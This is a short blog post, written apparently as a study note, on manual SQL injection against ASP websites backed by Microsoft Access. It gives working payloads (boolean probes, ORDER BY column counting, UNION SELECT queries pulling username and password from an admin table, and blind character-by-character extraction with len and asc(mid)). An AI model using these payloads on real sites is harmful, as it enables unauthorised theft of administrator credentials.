ASP + ACCESS manual injection vulnerablility

Access Database

  1. Introduction

Microsoft Access is a database management system (DBMS) from Microsoft that combines the relational Microsoft Jet Database Engine with a graphical user interface and software-development tools.

Microsoft Access stores data in its own format based on the Access Jet Database Engine. It can also import or link directly to data stored in other applications and databases.

  1. data structure

tables -> columns -> data

  1. editor for opening Microsoft Access

DBview、Easy Access

SQL Injection

  1. Process

    • check is there a SQL Injection
    • Guess the table name
    • Guess the column name
    • Guess the administrator's ID
    • Guess the length of username and password
    • Guess username and password

  2. Some query's ways

    • Union method
      and 1=1 and 1=2 # judge if it's a vulnerable point
      order by 22 # Guess how many columns they have
      union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22 from admin # Guess the table name (if return wrong, it said our guess is wrong, Otherwise the opposite)
      union select 1,2,username,4,5,6,7,8,9,10,11,12,13,14,password,16,17,18,19,20,21,22 from admin # Guess columns
    • World-for-World guessing
      and 1=1 and 1=2 # check the injection point
      and exists (select * from admin) # Guess the table name
      and exists (select user_name from admin) # Guess the column name
      confirm the length and ASCII value
      and (select top 1 len(user_name) from admin) = 5
      and (select top 1 asc(mid(user_name,1,1)) from admin)=97
      and (select top 1 asc(mid(user_name,2,1)) from admin)=97
posted @ 2021-01-19 17:40  咕咕鸟GGA  阅读(115)  评论(0)    收藏  举报